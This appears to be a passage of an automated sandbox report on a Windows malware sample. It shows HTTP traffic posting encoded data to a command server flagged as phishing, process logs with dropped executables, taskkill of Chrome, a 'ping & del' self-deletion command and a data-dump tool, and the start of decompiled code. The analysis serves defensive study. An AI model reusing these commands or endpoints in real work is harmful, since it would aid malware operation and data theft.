                                                                                                                                                    Set-Cookie: __cfduid=d32f2108bb076b21c1c63ae0d28e80c8e1611938216; expires=Sun, 28-Feb-21 16:36:56 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    cf-request-id: 07f09a51220000fa880fab6000000001
                                                                                                                                                    Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=4cBjVt6maK1fuMMQwP2NLxcTyTXIs04jwjJLktsaBAHCzMfSBk5sXhUCUfo1tWttLn99vsmrv4c3y411195%2BQM9Kt0D3ZN8BEjIGDpMtuLMG3f%2BpWg%3D%3D"}]}
                                                                                                                                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 61945ffb6a69fa88-AMS
                                                                                                                                                    Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport"
Jan 29, 2021 17:36:56.298440933 CET | 230 | OUT | POST /info_old/w HTTP/1.1
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                    upgrade-insecure-requests: 1
                                                                                                                                                    Content-Length: 81
                                                                                                                                                    Host: 84cfba021a5a6662.xyz
Jan 29, 2021 17:36:56.298528910 CET | 230 | OUT | Data Raw: 69 6e 66 6f 3d 57 79 53 41 6e 62 58 6a 57 54 56 55 2d 51 62 38 74 50 46 55 69 49 63 37 71 61 73 54 53 41 70 4b 38 35 4b 2d 4a 71 42 34 57 79 32 77 30 67 6f 35 4c 5a 74 58 56 54 73 53 51 77 4d 54 49 33 54 34 75 51 75 36 42 57 4d 67 78 70 67 7e
                                                                                                                                                    Data Ascii: info=WySAnbXjWTVU-Qb8tPFUiIc7qasTSApK85K-JqB4Wy2w0go5LZtXVTsSQwMTI3T4uQu6BWMgxpg~
Jan 29, 2021 17:36:56.357669115 CET | 231 | IN | HTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 29 Jan 2021 16:36:56 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Set-Cookie: __cfduid=d32f2108bb076b21c1c63ae0d28e80c8e1611938216; expires=Sun, 28-Feb-21 16:36:56 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    cf-request-id: 07f09a51900000fa8854a82000000001
                                                                                                                                                    Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=vEXjgAcCWfJcyMvkOYR6nKRhmvxrpnQ9If4uVJkHoTC%2BmHUhl3TvkTuOyvHTcR3VHcQHxuwGIbIsHFsPo39NKLWzrt1TdOP5Xspnnfrx95e0%2BZOKcA%3D%3D"}]}
                                                                                                                                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 61945ffc1c10fa88-AMS
                                                                                                                                                    Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport"
Jan 29, 2021 17:36:56.360771894 CET | 236 | OUT | GET /info_old/r HTTP/1.1
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                    upgrade-insecure-requests: 1
                                                                                                                                                    Host: 84cfba021a5a6662.xyz
Jan 29, 2021 17:36:56.421464920 CET | 237 | IN | HTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 29 Jan 2021 16:36:56 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Set-Cookie: __cfduid=d32f2108bb076b21c1c63ae0d28e80c8e1611938216; expires=Sun, 28-Feb-21 16:36:56 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    cf-request-id: 07f09a51d00000fa881c8c6000000001
                                                                                                                                                    Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=2R%2F90jP2adhrJ1reGaFc1uVWg0BTxfIBXZsYWbtqsmfadTi2Wy%2FxqhIGyogEoPocOCreTgk%2BamVP09M9vOnBLLLcfzZaC3rdbKVDP0I9AO%2Bdkcw30w%3D%3D"}]}
                                                                                                                                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 61945ffc7cf6fa88-AMS
                                                                                                                                                    Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewpo
Jan 29, 2021 17:36:58.555171967 CET | 242 | OUT | POST /info_old/w HTTP/1.1
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                    upgrade-insecure-requests: 1
                                                                                                                                                    Content-Length: 81
                                                                                                                                                    Host: 84cfba021a5a6662.xyz
Jan 29, 2021 17:36:58.555293083 CET | 242 | OUT | Data Raw: 69 6e 66 6f 3d 57 79 53 41 6e 62 58 6a 57 54 56 55 2d 51 62 38 74 50 46 55 69 49 63 37 71 61 73 54 53 41 70 4b 38 35 4b 2d 4a 71 42 34 57 79 32 77 30 67 6f 35 4c 5a 74 58 56 65 4c 39 39 71 72 45 30 32 4f 31 47 46 52 6a 30 50 36 5f 47 36 63 7e
                                                                                                                                                    Data Ascii: info=WySAnbXjWTVU-Qb8tPFUiIc7qasTSApK85K-JqB4Wy2w0go5LZtXVeL99qrE02O1GFRj0P6_G6c~
Jan 29, 2021 17:36:58.605498075 CET | 243 | IN | HTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 29 Jan 2021 16:36:58 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Set-Cookie: __cfduid=d603c7de3c048bd21973481136751b3721611938218; expires=Sun, 28-Feb-21 16:36:58 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    cf-request-id: 07f09a5a5f0000fa881330c000000001
                                                                                                                                                    Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=NJAqAO4yJWPuTq9evI1AWyMeynWnmxEMn3et8pb%2FIRWAHDRDQDU542KBRo8FHOiPxwUweybLvunWWx5kRs55wa40ZiQgHguurv9cq%2BH%2BRXDGjR9gjw%3D%3D"}]}
                                                                                                                                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 6194600a3d73fa88-AMS
                                                                                                                                                    Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.6 | 49734 | 104.21.23.16 | 80 | C:\Users\user\Desktop\Cyfj6XGbkd.exe

Timestamp | kBytes transferred | Direction | Data
Jan 29, 2021 17:37:04.743166924 CET | 254 | OUT | GET /info_old/ddd HTTP/1.1
                                                                                                                                                    Host: 84CFBA021A5A6662.xyz
                                                                                                                                                    Accept: */*
Jan 29, 2021 17:37:04.802903891 CET | 256 | IN | HTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 29 Jan 2021 16:37:04 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Set-Cookie: __cfduid=d1b86623561079a9b662c2aad2de952a91611938224; expires=Sun, 28-Feb-21 16:37:04 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    cf-request-id: 07f09a728b00001ea9ad122000000001
                                                                                                                                                    Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=wH1AHcFc3kF96qmxaUBXlzDcY1TrtECZey%2Fv0bKfWmOYNqSDV7GGD9mBtDVKq6xIogzQHOnoCmodhKiY1BSgSe06IfFuNHZGnZqol7y6zlSw5Ire4A%3D%3D"}],"group":"cf-nel"}
                                                                                                                                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 61946030d9121ea9-AMS
                                                                                                                                                    Data Ascii: 10d5<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" co
Jan 29, 2021 17:37:04.803014040 CET 257 IN
                                                                                                                                                    Data Ascii: ntent="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-
Jan 29, 2021 17:37:04.803195953 CET 259 IN
                                                                                                                                                    Data Ascii: <div class="cf-column"> <h2>What is phishing?</h2> <p>This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretending to be
Jan 29, 2021 17:37:04.803313017 CET 260 IN
                                                                                                                                                    Data Ascii: iv> </div> </div>... /.section --> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <
Jan 29, 2021 17:37:04.803493977 CET 260 IN Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0



                                                                                                                                                    System Behavior

                                                                                                                                                    General

                                                                                                                                                    Start time:17:36:33
                                                                                                                                                    Start date:29/01/2021
                                                                                                                                                    Path:C:\Users\user\Desktop\Cyfj6XGbkd.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:'C:\Users\user\Desktop\Cyfj6XGbkd.exe'
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:4247224 bytes
                                                                                                                                                    MD5 hash:63204EB716C856723A010747D58A6B00
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: Ping_Command_in_EXE, Description: Detects an suspicious ping command execution in an executable, Source: 00000000.00000002.366076006.00000000025E0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                    Reputation:low

                                                                                                                                                    General

                                                                                                                                                    Start time:17:36:38
                                                                                                                                                    Start date:29/01/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi'
                                                                                                                                                    Imagebase:0xf20000
                                                                                                                                                    File size:59904 bytes
                                                                                                                                                    MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    General

                                                                                                                                                    Start time:17:36:39
                                                                                                                                                    Start date:29/01/2021
                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe 0011 user01
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:4247224 bytes
                                                                                                                                                    MD5 hash:63204EB716C856723A010747D58A6B00
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: Ping_Command_in_EXE, Description: Detects an suspicious ping command execution in an executable, Source: 00000002.00000002.413908813.0000000002810000.00000040.00000001.sdmp, Author: Florian Roth
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
• Detection: 24%, Metadefender
• Detection: 59%, ReversingLabs
                                                                                                                                                    Reputation:low

                                                                                                                                                    General

                                                                                                                                                    Start time:17:36:39
                                                                                                                                                    Start date:29/01/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding C6BE2003C858D11BE040843C2C46EAA2 C
                                                                                                                                                    Imagebase:0xf20000
                                                                                                                                                    File size:59904 bytes
                                                                                                                                                    MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    General

                                                                                                                                                    Start time:17:36:40
                                                                                                                                                    Start date:29/01/2021
                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe 200 user01
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:4247224 bytes
                                                                                                                                                    MD5 hash:63204EB716C856723A010747D58A6B00
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: Ping_Command_in_EXE, Description: Detects an suspicious ping command execution in an executable, Source: 00000004.00000002.378006718.0000000002560000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                    Reputation:low

                                                                                                                                                    General

                                                                                                                                                    Start time:17:36:41
                                                                                                                                                    Start date:29/01/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\Cyfj6XGbkd.exe'
                                                                                                                                                    Imagebase:0x2a0000
                                                                                                                                                    File size:232960 bytes
                                                                                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    General

                                                                                                                                                    Start time:17:36:41
                                                                                                                                                    Start date:29/01/2021
                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    Imagebase:0x7ff61de10000
                                                                                                                                                    File size:625664 bytes
                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    General

                                                                                                                                                    Start time:17:36:43
                                                                                                                                                    Start date:29/01/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:ping 127.0.0.1 -n 3
                                                                                                                                                    Imagebase:0x1120000
                                                                                                                                                    File size:18944 bytes
                                                                                                                                                    MD5 hash:70C24A306F768936563ABDADB9CA9108
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:moderate

                                                                                                                                                    General

                                                                                                                                                    Start time:17:36:46
                                                                                                                                                    Start date:29/01/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                    Imagebase:0x2a0000
                                                                                                                                                    File size:232960 bytes
                                                                                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    General

                                                                                                                                                    Start time:17:36:47
                                                                                                                                                    Start date:29/01/2021
                                                                                                                                                    Path:C:\Users\user\AppData\Roaming\1611970637183.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:'C:\Users\user\AppData\Roaming\1611970637183.exe' /sjson 'C:\Users\user\AppData\Roaming\1611970637183.txt'
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:103632 bytes
                                                                                                                                                    MD5 hash:EF6F72358CB02551CAEBE720FBC55F95
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:low

                                                                                                                                                    General

                                                                                                                                                    Start time:17:36:47
                                                                                                                                                    Start date:29/01/2021
                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    Imagebase:0x7ff61de10000
                                                                                                                                                    File size:625664 bytes
                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    General

                                                                                                                                                    Start time:17:36:48
                                                                                                                                                    Start date:29/01/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:taskkill /f /im chrome.exe
                                                                                                                                                    Imagebase:0x330000
                                                                                                                                                    File size:74752 bytes
                                                                                                                                                    MD5 hash:15E2E0ACD891510C6268CB8899F2A1A1
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:moderate

                                                                                                                                                    General

                                                                                                                                                    Start time:17:36:49
                                                                                                                                                    Start date:29/01/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe'
                                                                                                                                                    Imagebase:0x2a0000
                                                                                                                                                    File size:232960 bytes
                                                                                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    General

                                                                                                                                                    Start time:17:36:50
                                                                                                                                                    Start date:29/01/2021
                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    Imagebase:0x7ff61de10000
                                                                                                                                                    File size:625664 bytes
                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    General

                                                                                                                                                    Start time:17:36:50
                                                                                                                                                    Start date:29/01/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:ping 127.0.0.1 -n 3
                                                                                                                                                    Imagebase:0x1120000
                                                                                                                                                    File size:18944 bytes
                                                                                                                                                    MD5 hash:70C24A306F768936563ABDADB9CA9108
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    General

                                                                                                                                                    Start time:17:36:59
                                                                                                                                                    Start date:29/01/2021
                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe'
                                                                                                                                                    Imagebase:0x990000
                                                                                                                                                    File size:73160 bytes
                                                                                                                                                    MD5 hash:F0372FF8A6148498B19E04203DBB9E69
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Antivirus matches:
                                                                                                                                                     • Detection: 0%, Metadefender
                                                                                                                                                    • Detection: 2%, ReversingLabs

                                                                                                                                                    General

                                                                                                                                                    Start time:17:37:05
                                                                                                                                                    Start date:29/01/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe'
                                                                                                                                                    Imagebase:0x2a0000
                                                                                                                                                    File size:232960 bytes
                                                                                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    General

                                                                                                                                                    Start time:17:37:05
                                                                                                                                                    Start date:29/01/2021
                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    Imagebase:0x7ff61de10000
                                                                                                                                                    File size:625664 bytes
                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    General

                                                                                                                                                    Start time:17:37:06
                                                                                                                                                    Start date:29/01/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:ping 127.0.0.1 -n 3
                                                                                                                                                    Imagebase:0x1120000
                                                                                                                                                    File size:18944 bytes
                                                                                                                                                    MD5 hash:70C24A306F768936563ABDADB9CA9108
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    Disassembly

                                                                                                                                                    Code Analysis

                                                                                                                                                      Executed Functions

                                                                                                                                                      C-Code - Quality: 88%
                                                                                                                                                      			E100204C0(void* __ebx, void* __edi, void* __eflags) {
                                                                                                                                                      				int _v8;
                                                                                                                                                      				intOrPtr _v16;
                                                                                                                                                      				char _v44;
                                                                                                                                                      				char _v311;
                                                                                                                                                      				char _v312;
                                                                                                                                                      				char _v575;
                                                                                                                                                      				char _v576;
                                                                                                                                                      				long _v580;
                                                                                                                                                      				intOrPtr _v584;
                                                                                                                                                      				intOrPtr _v588;
                                                                                                                                                      				intOrPtr _v592;
                                                                                                                                                      				intOrPtr _v596;
                                                                                                                                                      				intOrPtr _v600;
                                                                                                                                                      				intOrPtr _v604;
                                                                                                                                                      				intOrPtr _v608;
                                                                                                                                                      				intOrPtr _v612;
                                                                                                                                                      				intOrPtr _v616;
                                                                                                                                                      				intOrPtr _v620;
                                                                                                                                                      				intOrPtr _v624;
                                                                                                                                                      				intOrPtr _v628;
                                                                                                                                                      				void* __esi;
                                                                                                                                                      				void* _t46;
                                                                                                                                                      				int _t47;
                                                                                                                                                      				void* _t56;
                                                                                                                                                      				void* _t57;
                                                                                                                                                      				int _t62;
                                                                                                                                                      				intOrPtr _t73;
                                                                                                                                                      				int _t75;
                                                                                                                                                      				int _t77;
                                                                                                                                                      				void* _t101;
                                                                                                                                                      				intOrPtr _t104;
                                                                                                                                                      				void* _t108;
                                                                                                                                                      				void* _t109;
                                                                                                                                                      				void* _t111;
                                                                                                                                                      				intOrPtr _t114;
                                                                                                                                                      				void* _t115;
                                                                                                                                                      				intOrPtr _t116;
                                                                                                                                                      				intOrPtr _t118;
                                                                                                                                                      				intOrPtr _t120;
                                                                                                                                                      				void* _t125;
                                                                                                                                                      
                                                                                                                                                      				_t125 = __eflags;
                                                                                                                                                      				_t100 = __edi;
                                                                                                                                                      				_t82 = __ebx;
                                                                                                                                                      				_push(0xffffffff);
                                                                                                                                                      				_push(E10022D01);
                                                                                                                                                      				_push( *[fs:0x0]);
                                                                                                                                                      				 *[fs:0x0] = _t104;
                                                                                                                                                      				_push(_t101);
                                                                                                                                                      				E1001FD60();
                                                                                                                                                      				_v312 = 0;
                                                                                                                                                      				E1000CF20(__edi,  &_v311, 0, 0x103);
                                                                                                                                                      				GetModuleFileNameA(0,  &_v312, 0x104);
                                                                                                                                                      				E1001A600(__ebx, _t100, _t101, _t125,  &_v44); // executed
                                                                                                                                                      				_v8 = 0;
